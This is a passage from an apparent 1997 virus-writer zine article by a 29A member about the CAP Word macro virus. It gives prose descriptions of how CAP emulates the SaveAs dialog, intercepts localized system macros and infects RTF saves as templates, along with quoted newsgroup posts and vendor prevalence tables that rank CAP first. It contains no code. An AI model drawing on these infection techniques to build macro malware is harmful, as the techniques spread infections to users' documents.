ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Its kind of curious that the AVP virus description was the only one
mentionin somethin about CAP bein able to "emulate" the "SaveAs" function;
however, it ended up makin the rubish, inaccurate statement: "it writes an
empty document to disk". While it's to Kasper's credit that he noticed the
"SaveAs" emulation, it's unforgivable for any AVer not to know how Word
templatez work. CAP, when emulatin the "SaveAs" function, doesnt write any
"empty" document to disk; it rather creates a new clean document based on
the active template, which is the infected document itself, and as such it
is not empty. Then CAP saves the new document to disk dependin on the user's
choice at the "SaveAs" dialog box and finally infects it. The whole purpose
of all this is just to make the user happy by lettin him select the drive,
file format and directory names when the "SaveAs" dialog box appears.
In the article "Macro virus tricks", point 2 (The "SaveAs" problem), point
2.1 (The "SaveAs" solution) and point 2.2 (The "SaveAs" example), it is
explained in full detail how this "SaveAs" emulation can be achieved in
order to solve the "SaveAs" problem.
5. Shortcutz
ÄÄÄÄÄÄÄÄÄÄÄÄ
(*) alt.comp.virus
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
> CAP.A is a fairly new Word Macro virus. The latest version of McAfee
> should be able to clean it. If it doesn't, you might want to try
> F-Macro from http://www.datafellows.com
BTW, down here (Belgium, Luxembourg, France) and among our global
customers, the CAP virus family has almost instantly become the most
widespread virus we have ever met. Roughly 80% (yes eighty percent)
of all our virus related tech support calls have been about that virus
during the last two months.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
(*) alt.comp.virus
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
> The trick really seems to work (which makes me suppose it's a
> lousy virus, given that it lets itself be bypassed so easily),
Don't be fooled. For a macro virus, Macro.Word.Cap is
rather complex and contains an innovative technique that allows it
to bypass the barriers set by Word's localization and therefore to
intercept system macros in many versions of Word that use a
language other than English. From a purely technical point of view,
Cap is anything but a trivial virus.
In general, Normal.dot is never write-protected, so
virus writers who write macro viruses take a different approach
from those who write more "traditional" viruses. It is no
accident that Macro.Word.Cap is by now one of the most widespread viruses
in Italy, if not the most widespread of all in our country.
> 2) what effects does the CAP macro virus cause (assuming it was that one),
> besides deleting the macro and hiding some Word commands?
Nothing in particular.
The virus intercepts the FileSalvaConNome system command and checks
whether it is being used to write documents, templates or files in
Rich Text Format (RTF). In those cases, it converts the file into a template
and infects it. The result is that a file saved in RTF format,
which normally contains no macros, will nonetheless be infected, since
it will actually be saved as a template.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
(*) http://www.geocities.com/SiliconValley/Heights/3652/F.HTM
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Virus Alerts
(based on messages posted to alt.comp.virus)
08-11-97: WM/CAP is becoming the most common virus
05-12-97: Hoax virus alert posted to several newsgroups
05-08-97: WM/Helper virus will put passwords on documents
04-27-97: Word Macro NPad virus in the wild
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
(*) http://www.sophos.com/virusinfo/topten/jul97.html
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Top ten viruses reported to Sophos last month: July 1997 virus top ten
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
July 1997
This month  Last month  Name              Percentage of reports
ÄÄÄÄÄÄÄÄÄÄ  ÄÄÄÄÄÄÄÄÄÄ  ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ  ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1           1           Winword/CAP       14.1%
2           5           Form              12.7%
3           3           Anticmos           8.5%
4           7           Winword/Concept    7.0%
5           8           Excel/Laroux       5.6%
5           15          New Zealand-i      5.6%
5           2           Parity Boot        5.6%
8           5           Winword/Npad       4.2%
9           3           CMOS4              2.8%
9           new         Winword/Switchr    2.8%
                        Others            31.1%
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
(*) http://www.itasa.com.mx/fprot/soporte/mexvir.htm
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
The most common viruses in Mexico
VIRUS      CATEGORY      DETECTABLE  REMOVABLE  PROCEDURE
ÄÄÄÄÄÄÄÄ   ÄÄÄÄÄÄÄÄÄ     ÄÄÄÄÄÄÄÄÄÄ  ÄÄÄÄÄÄÄÄÄ  ÄÄÄÄÄÄÄÄÄÄÄÄÄ
CAP.A      Macro         yes         yes        F-POTATOE 2.27+ (Windows)
15 Years   MBR           yes         yes*       Fixdisk repair
Concept    Macro         yes         yes        F-POTATOE (Windows)
Wazzu      Macro         yes         yes        F-POTATOE (Windows)
NPad       Macro         yes         yes        F-POTATOE (Windows)
Implant    MBR/com/exe   yes         yes        F-IMPLAN (see tech. note #60)
Monkey     MBR           yes         yes        F-potatoe /hard /disinf
Byway      com/exe       yes         yes**      See technical note #58
Natas      MBR/com/exe   yes         yes        F-potatoe /hard /disinf
Boot.437   Boot          yes         yes        Sys c: diskette.
Exebug     MBR           yes         yes        F-potatoe /hard /disinf
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Btw, note that Implant (original name: SuckSexee), another virus written by
a 29A member (GriYo), ranks sixth as the most widespread virus in Mexico.
(*) http://www.dataalert.com/top.htm
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Virus Top 10
Data Alert International B.V.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The most reported and prevalent viruses in the Benelux.
JULY-AUGUST 1997
Rank  Virus name   Virus type
ÄÄÄÄ  ÄÄÄÄÄÄÄÄÄÄ   ÄÄÄÄÄÄÄÄÄÄ
1.    WM/Cap       Macro
2.    XM/Laroux    Macro
3.    Antiexe      Boot
4.    WM/Npad      Macro
5.    AntiCMOS.A   Boot
6.    WM/Concept   Macro
7.    Junkie       Multi
8.    Ripper       Boot
9.    NYB          Boot
10.   Parity.Boot  Boot
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
(*) http://www.virusbtn.com/Prevalence/199708.html
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
VB Prevalence Table, August 1997
Virus Name   Type   Number of incidents  Percentage
ÄÄÄÄÄÄÄÄÄÄ   ÄÄÄÄ   ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ  ÄÄÄÄÄÄÄÄÄÄ
CAP          Macro  145                   28.5%
Concept      Macro   51                   10.0%
NPad         Macro   39                    7.7%
Dodgy        Boot    26                    5.1%
Parity_Boot  Boot    24                    4.7%
Form         Boot    21                    4.1%
AntiEXE      Boot    19                    3.7%
Temple       Macro   16                    3.1%
Laroux       Macro   15                    3.0%
Wazzu        Macro   14                    2.8%
[...]
Total:              508                  100.0%
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
6. Disclaimer
ÄÄÄÄÄÄÄÄÄÄÄÄÄ
This information is for educational purposez only. The author is not
responsible for any problemz caused by the use of this information.
(c) 1997. Jacky Qwerty/29A.